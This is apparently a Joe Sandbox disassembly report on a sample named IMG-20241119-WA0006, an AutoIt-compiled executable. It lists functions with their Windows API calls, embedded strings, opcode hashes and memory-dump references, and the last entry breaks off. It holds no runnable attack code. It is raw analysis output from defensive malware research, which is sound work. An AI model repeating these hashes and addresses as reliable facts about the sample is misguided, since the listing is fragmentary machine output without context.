Instruction ID: 16a5b03ebc0a773bb4fc7c39ee38482f20ef04f53cd8ca9183211f083994c9c8
Opcode Fuzzy Hash: 4adf32598cf13d96bebc2418b81f1fdfaf22399d51f39179f462980c7a413522
Instruction Fuzzy Hash: 33519D30648302ABC620EB54C882E6DB7E0FB94705F24597FF0679B296DB70D985DB46

Function 0008CC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0008CC68
__wcsnicmp.LIBCMT ref: 0008CC80
__wcsnicmp.LIBCMT ref: 0008CC98
__wcsnicmp.LIBCMT ref: 0008CCB0
__wcsnicmp.LIBCMT ref: 0008CCC8
__wcsnicmp.LIBCMT ref: 0008CCE0
__wcsnicmp.LIBCMT ref: 0008CCF8
__wcsnicmp.LIBCMT ref: 0008CD0C
__wcsnicmp.LIBCMT ref: 0008CD4D
__wcsnicmp.LIBCMT ref: 0008CD61
__wcsnicmp.LIBCMT ref: 0008CD75
__wcsnicmp.LIBCMT ref: 0008CD89

Strings

Cannot parse #include, xrefs: 000F2FA1
#comments-end, xrefs: 0008CD6F
#notrayicon, xrefs: 0008CC7A
#pragma compile, xrefs: 0008CC62
#include, xrefs: 0008CCDA
#requireadmin, xrefs: 0008CC92
#cs, xrefs: 0008CD06, 0008CD5B
Bad directive syntax error, xrefs: 000F2ECB
#comments-start, xrefs: 0008CCF2, 0008CD47
Unterminated group of comments, xrefs: 000F2FB4
#OnAutoItStartRegister, xrefs: 0008CCAA
#ce, xrefs: 0008CD83
#include-once, xrefs: 0008CCC2

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: ccfb0ba9911501902fd847f5468642ed23850bd696bfb2c0c5650e3331683b7c
Instruction ID: 3bfe51be466d9ed9a3cc125d42735bf78402170940cd8bec146a1fec842c9fc9
Opcode Fuzzy Hash: ccfb0ba9911501902fd847f5468642ed23850bd696bfb2c0c5650e3331683b7c
Instruction Fuzzy Hash: F281E531640219ABEB24BAA4ED42FFE37B9BF25310F044039F945AA1C3EB74D945D3A5

Function 000E638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,0011DC00), ref: 000E6449

Strings

EDITPASTE, xrefs: 000E675B
CURRENTTAB, xrefs: 000E64DD
DELSTRING, xrefs: 000E6569
SELECTSTRING, xrefs: 000E6626
UNCHECK, xrefs: 000E66A1
CHECK, xrefs: 000E668B
SENDCOMMANDID, xrefs: 000E67CA
ISVISIBLE, xrefs: 000E6455
ISENABLED, xrefs: 000E648C
TABLEFT, xrefs: 000E64A7
GETLINE, xrefs: 000E678B
HIDEDROPDOWN, xrefs: 000E6520
SETCURRENTSELECTION, xrefs: 000E65D6
GETLINECOUNT, xrefs: 000E66E4
GETCURRENTSELECTION, xrefs: 000E6603
GETSELECTED, xrefs: 000E66C1
FINDSTRING, xrefs: 000E6596
TABRIGHT, xrefs: 000E64BD
ADDSTRING, xrefs: 000E6536
ISCHECKED, xrefs: 000E6659
SHOWDROPDOWN, xrefs: 000E6500
GETCURRENTCOL, xrefs: 000E6724
GETCURRENTLINE, xrefs: 000E6704

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: BuffCharUpper
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 3964851224-45149045
Opcode ID: 4f4cf90d507dd4cfc1ab2b84a03be801f119a8355d4b42de5f40d747a7399910
Instruction ID: e8d05dab7ca5deb3279356d5f5c3d8c98d21943eb238cd119c0ea47a4321b540
Opcode Fuzzy Hash: 4f4cf90d507dd4cfc1ab2b84a03be801f119a8355d4b42de5f40d747a7399910
Instruction Fuzzy Hash: CEC160702042858FCB14EF11D551AEE77E5BFA4384F044859F8966B3A3DB22ED4BDB82

Function 000ED575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 000ED5AE
SetTextColor.GDI32(?,?), ref: 000ED5B2
GetSysColorBrush.USER32(0000000F), ref: 000ED5C8
GetSysColor.USER32(0000000F), ref: 000ED5D3
CreateSolidBrush.GDI32(?), ref: 000ED5D8
GetSysColor.USER32(00000011), ref: 000ED5F0
CreatePen.GDI32(00000000,00000001,00743C00), ref: 000ED5FE
SelectObject.GDI32(?,00000000), ref: 000ED60F
SetBkColor.GDI32(?,00000000), ref: 000ED618
SelectObject.GDI32(?,?), ref: 000ED625
InflateRect.USER32(?,000000FF,000000FF), ref: 000ED644
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 000ED65B
GetWindowLongW.USER32(00000000,000000F0), ref: 000ED670
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 000ED698
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 000ED6BF
InflateRect.USER32(?,000000FD,000000FD), ref: 000ED6DD
DrawFocusRect.USER32(?,?), ref: 000ED6E8
GetSysColor.USER32(00000011), ref: 000ED6F6
SetTextColor.GDI32(?,00000000), ref: 000ED6FE
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 000ED712
SelectObject.GDI32(?,000ED2A5), ref: 000ED729
DeleteObject.GDI32(?), ref: 000ED734
SelectObject.GDI32(?,?), ref: 000ED73A
DeleteObject.GDI32(?), ref: 000ED73F
SetTextColor.GDI32(?,?), ref: 000ED745
SetBkColor.GDI32(?,?), ref: 000ED74F

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: b0cb09813e5db9aa674625aab9cb5e2e370f201121cd5c8adb68d3801b948b72
Instruction ID: 37274854d8c46cbcdfe1b5f98dd50f766fd1fd5cc9bb90d0fee42482fa8b6530
Opcode Fuzzy Hash: b0cb09813e5db9aa674625aab9cb5e2e370f201121cd5c8adb68d3801b948b72
Instruction Fuzzy Hash: 66513072900208BFDF109FA5EC48EAE7BB9FF48324F114515FA55AB2A1DBB19A40DF50

Function 000EB6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 000EB7B0
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 000EB7C1
CharNextW.USER32(0000014E), ref: 000EB7F0
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 000EB831
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 000EB847
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 000EB858
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 000EB875
SetWindowTextW.USER32(?,0000014E), ref: 000EB8C7
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 000EB8DD
SendMessageW.USER32(?,00001002,00000000,?), ref: 000EB90E
_memset.LIBCMT ref: 000EB933
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 000EB97C
_memset.LIBCMT ref: 000EB9DB
SendMessageW.USER32 ref: 000EBA05
SendMessageW.USER32(?,00001074,?,00000001), ref: 000EBA5D
SendMessageW.USER32(?,0000133D,?,?), ref: 000EBB0A
InvalidateRect.USER32(?,00000000,00000001), ref: 000EBB2C
GetMenuItemInfoW.USER32(?), ref: 000EBB76
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 000EBBA3
DrawMenuBar.USER32(?), ref: 000EBBB2
SetWindowTextW.USER32(?,0000014E), ref: 000EBBDA

Strings

0, xrefs: 000EBB4F

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: d6105c1e5778fa9e480de106526f065a7853e512a2f1814459effa29a754087b
Instruction ID: b5a507d26c3d42495bce963eca520ee25ca1fb1973b72fa8438a3b39985f9306
Opcode Fuzzy Hash: d6105c1e5778fa9e480de106526f065a7853e512a2f1814459effa29a754087b
Instruction Fuzzy Hash: CDE17F75900258AFDB209FA6DC84AFF7BB8FF05710F108156F959BA191DBB08A81DF60

Function 000E764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 000E778A
GetDesktopWindow.USER32 ref: 000E779F
GetWindowRect.USER32(00000000), ref: 000E77A6
GetWindowLongW.USER32(?,000000F0), ref: 000E7808
DestroyWindow.USER32(?), ref: 000E7834
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 000E785D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000E787B
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 000E78A1
SendMessageW.USER32(?,00000421,?,?), ref: 000E78B6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 000E78C9
IsWindowVisible.USER32(?), ref: 000E78E9
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 000E7904
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 000E7918
GetWindowRect.USER32(?,?), ref: 000E7930
MonitorFromPoint.USER32(?,?,00000002), ref: 000E7956
GetMonitorInfoW.USER32 ref: 000E7970
CopyRect.USER32(?,?), ref: 000E7987
SendMessageW.USER32(?,00000412,00000000), ref: 000E79F2

Strings

tooltips_class32, xrefs: 000E7856
0, xrefs: 000E7735
(, xrefs: 000E7965

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 583014b7e733d917bafd1fbf863e534884fcd198cfbd3ecd4d8660fef7f8f2a9
Instruction ID: 88383854fdfcfbbb3b2fba3c59b93522375646d41bfd431bb545ac1cde941930
Opcode Fuzzy Hash: 583014b7e733d917bafd1fbf863e534884fcd198cfbd3ecd4d8660fef7f8f2a9
Instruction Fuzzy Hash: BEB19E71608341AFDB54DF65C948B6ABBE4FF88310F00891DF59DAB292DB70E845CB92

Function 0009A856 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0009A939
GetSystemMetrics.USER32(00000007), ref: 0009A941
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0009A96C
GetSystemMetrics.USER32(00000008), ref: 0009A974
GetSystemMetrics.USER32(00000004), ref: 0009A999
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0009A9B6
AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0009A9C6
CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0009A9F9
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0009AA0D
GetClientRect.USER32(00000000,000000FF), ref: 0009AA2B
GetStockObject.GDI32(00000011), ref: 0009AA47
SendMessageW.USER32(00000000,00000030,00000000), ref: 0009AA52

Part of subcall function 0009B63C: GetCursorPos.USER32(000000FF), ref: 0009B64F
Part of subcall function 0009B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0009B66C
Part of subcall function 0009B63C: GetAsyncKeyState.USER32(00000001), ref: 0009B691
Part of subcall function 0009B63C: GetAsyncKeyState.USER32(00000002), ref: 0009B69F

SetTimer.USER32(00000000,00000000,00000028,0009AB87), ref: 0009AA79

Strings

AutoIt v3 GUI, xrefs: 0009A9F1

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 85c7163ae83c546a80606ae974551d43cdfcc978e60c509025805c70507cb2f8
Instruction ID: b98e18a2adff735103a7f13d625bb367b20594f96ca0cab3502ab0c1f4b046ff
Opcode Fuzzy Hash: 85c7163ae83c546a80606ae974551d43cdfcc978e60c509025805c70507cb2f8
Instruction Fuzzy Hash: 8AB1AC75A4020AAFDF14DFA8DC45BEE7BB5FB09314F114229FA15A72A0DBB0D880DB51

Function 00082EC0 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00082F7A
IsWindow.USER32(?), ref: 000F22FD

Strings

CLASS, xrefs: 000F2128
ALL, xrefs: 000F2264
REGEXPCLASS, xrefs: 000F2149
HANDLE, xrefs: 000F20E2
INSTANCE, xrefs: 000F223C
ACTIVE, xrefs: 000F20CC
TITLE, xrefs: 000F2292
LAST, xrefs: 000F20B6
REGEXPTITLE, xrefs: 000F20F8

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Window$Foreground
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 62970417-1919597938
Opcode ID: 6a062d09580738881853b39ec3fc117ca9eb1dc5323312da0ede6d164411b301
Instruction ID: b4bb0d064d990776c3ac09e10067d78f7685445f56b2e05df335cff261a65919
Opcode Fuzzy Hash: 6a062d09580738881853b39ec3fc117ca9eb1dc5323312da0ede6d164411b301
Instruction Fuzzy Hash: A2D1D870104646ABCB54EF50C4819EEFBF0BF54304F10492DF69667AA3DB30E99AEB91

Function 000E3639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000E3735
RegCreateKeyExW.ADVAPI32(?,?,00000000,0011DC00,00000000,?,00000000,?,?), ref: 000E37A3
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 000E37EB
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 000E3874
RegCloseKey.ADVAPI32(?), ref: 000E3B94
RegCloseKey.ADVAPI32(00000000), ref: 000E3BA1

Strings

REG_MULTI_SZ, xrefs: 000E395C
REG_QWORD, xrefs: 000E3AE2
REG_SZ, xrefs: 000E38B2
REG_EXPAND_SZ, xrefs: 000E3811
REG_DWORD, xrefs: 000E3A65
REG_BINARY, xrefs: 000E3B2F

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 902d1fa970bbfc503b6896b693921b1a14dd97743c0a2825d55ed5c991c4409d
Instruction ID: 27c229078b915ea1ed16d5b8f6d368b0d5119b0ba1eda9c741ef1d6a3d41898a
Opcode Fuzzy Hash: 902d1fa970bbfc503b6896b693921b1a14dd97743c0a2825d55ed5c991c4409d
Instruction Fuzzy Hash: BD024B75604601AFCB15EF25C855A6EB7E5FF88710F04845DF99AAB3A2CB30EE41CB81

Function 000E6BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 000E6C56
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 000E6D16

Strings

SELECTCLEAR, xrefs: 000E6D8D
DESELECT, xrefs: 000E6DFC
VIEWCHANGE, xrefs: 000E6ECD
GETSELECTEDCOUNT, xrefs: 000E6CF9
SELECTALL, xrefs: 000E6D75
SELECTINVERT, xrefs: 000E6DDE
GETSELECTED, xrefs: 000E6E3C
FINDITEM, xrefs: 000E6E81
ISSELECTED, xrefs: 000E6D21
GETSUBITEMCOUNT, xrefs: 000E6CA1
SELECT, xrefs: 000E6DA8
GETTEXT, xrefs: 000E6CBF
GETITEMCOUNT, xrefs: 000E6C84

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: 00238e93a7c7cdba04a9d64f68467a1e69087520ac9f4880fc25bf506a0ba8a1
Instruction ID: 7b25e15ff1629699a96b2113a136db2c477c5a5dcae5f087d8f6406d33b237d7
Opcode Fuzzy Hash: 00238e93a7c7cdba04a9d64f68467a1e69087520ac9f4880fc25bf506a0ba8a1
Instruction Fuzzy Hash: 67A17C702042819FCB14EF21D951AAEB3E5BFA4354F14496DB8A6AB3D3DB31EC06DB41

Function 000BCF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 000BCF91
__swprintf.LIBCMT ref: 000BD032
_wcscmp.LIBCMT ref: 000BD045
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 000BD09A
_wcscmp.LIBCMT ref: 000BD0D6
GetClassNameW.USER32(?,?,00000400), ref: 000BD10D
GetDlgCtrlID.USER32(?), ref: 000BD15F
GetWindowRect.USER32(?,?), ref: 000BD195
GetParent.USER32(?), ref: 000BD1B3
ScreenToClient.USER32(00000000), ref: 000BD1BA
GetClassNameW.USER32(?,?,00000100), ref: 000BD234
_wcscmp.LIBCMT ref: 000BD248
GetWindowTextW.USER32(?,?,00000400), ref: 000BD26E
_wcscmp.LIBCMT ref: 000BD282

Strings

%s%u, xrefs: 000BD02C

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
String ID: %s%u
API String ID: 3119225716-679674701
Opcode ID: 0728226d90666b3fe9a43aea53b2a39465507b8abbcf0adfb92b245f93a3f418
Instruction ID: c0cf12647c03b5dd7332ec76d6171d7b651e7b30d1286b51cb48a8a9271d08b7
Opcode Fuzzy Hash: 0728226d90666b3fe9a43aea53b2a39465507b8abbcf0adfb92b245f93a3f418
Instruction Fuzzy Hash: 7FA1CD71604746ABD714DF64C884FEAF7E8FF54314F008A2AF999D2181EB30EA45CBA1

Function 000BD8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 000BD8EB
_wcscmp.LIBCMT ref: 000BD8FC
GetWindowTextW.USER32(00000001,?,00000400), ref: 000BD924
CharUpperBuffW.USER32(?,00000000), ref: 000BD941
_wcscmp.LIBCMT ref: 000BD95F
_wcsstr.LIBCMT ref: 000BD970
GetClassNameW.USER32(00000018,?,00000400), ref: 000BD9A8
_wcscmp.LIBCMT ref: 000BD9B8
GetWindowTextW.USER32(00000002,?,00000400), ref: 000BD9DF
GetClassNameW.USER32(00000018,?,00000400), ref: 000BDA28
_wcscmp.LIBCMT ref: 000BDA38
GetClassNameW.USER32(00000010,?,00000400), ref: 000BDA60
GetWindowRect.USER32(00000004,?), ref: 000BDAC9

Strings

ThumbnailClass, xrefs: 000BD9B3, 000BDA33
@, xrefs: 000BD8C6

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: b92d52ee2bd52d769fbf0ac50c4cedad7e1ee6c6397bc20677fa1f3512279415
Instruction ID: 182673bacfc1d0029242ea56afc5432efafd480b6ccf5c38444ef5410cda911a
Opcode Fuzzy Hash: b92d52ee2bd52d769fbf0ac50c4cedad7e1ee6c6397bc20677fa1f3512279415
Instruction Fuzzy Hash: 77819D310083059BDB15DF60D885FEABBE8FF84714F08846AFD899A096EB74DD45CBA1

Function 000BD6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 000BD753

Strings

ALL, xrefs: 000BD7E7
[REGEXPTITLE:, xrefs: 000BD77B
CLASSNAME=, xrefs: 000BD790
[LAST, xrefs: 000BD800
[CLASS:, xrefs: 000BD7A3
ACTIVE, xrefs: 000BD72E
LAST, xrefs: 000BD718
[ACTIVE, xrefs: 000BD740
REGEXP=, xrefs: 000BD768
HANDLE=, xrefs: 000BD74C
[ALL, xrefs: 000BD7F9
[HANDLE:, xrefs: 000BD75F

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: __wcsnicmp
